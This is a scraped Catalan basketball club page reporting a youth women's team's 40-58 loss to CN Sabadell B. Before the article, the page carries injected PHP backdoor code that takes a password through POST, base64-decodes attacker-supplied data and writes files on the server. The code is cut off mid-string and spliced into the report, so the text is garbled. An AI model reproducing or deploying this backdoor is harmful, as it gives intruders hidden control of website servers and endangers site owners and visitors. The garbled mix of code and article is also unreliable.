function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 04 A no troba el seu lloc a la pista i perd clarament contra el CN Sabadell B (40-58) - Tgn Bàsquet Club -

El cadet femení 04 A no troba el seu lloc a la pista i perd clarament contra el CN Sabadell B (40-58)

Updated: setembre 24, 2019

El cadet femení 04 A va perdre clarament contra un rival que es va mostrar superior. L’equip tarragoní, que ha perdut els dos partits de lliga que ha disputat, no va fer un bon partit i va ser superat pel CN Sabadell B des del començament. La pressió defensiva visitant a tota la pista va estabornir el TGN Bàsquet, que es va bloquejar ofensivament. En el rebot, el domini també va ser de les sabadellenques. Al descans, el resultat era de 17-28.

El panorama no va millorar en el tercer quart. Les pèrdues de pilota de les locals van afavorir el joc de les visitants que van arribar als últims deu minuts amb una renda de 21 punts (23-44), arribant a una màxima de 24 minuts abans. El TGN Bàsquet, però, va anar retallant diferències fins a un desavantatge de 10 punts i possessió de pilota a tres minuts del final. Però les imprecisions van tornar a aparèixer i tres pèrdues de pilota seguides van certificar la derrota.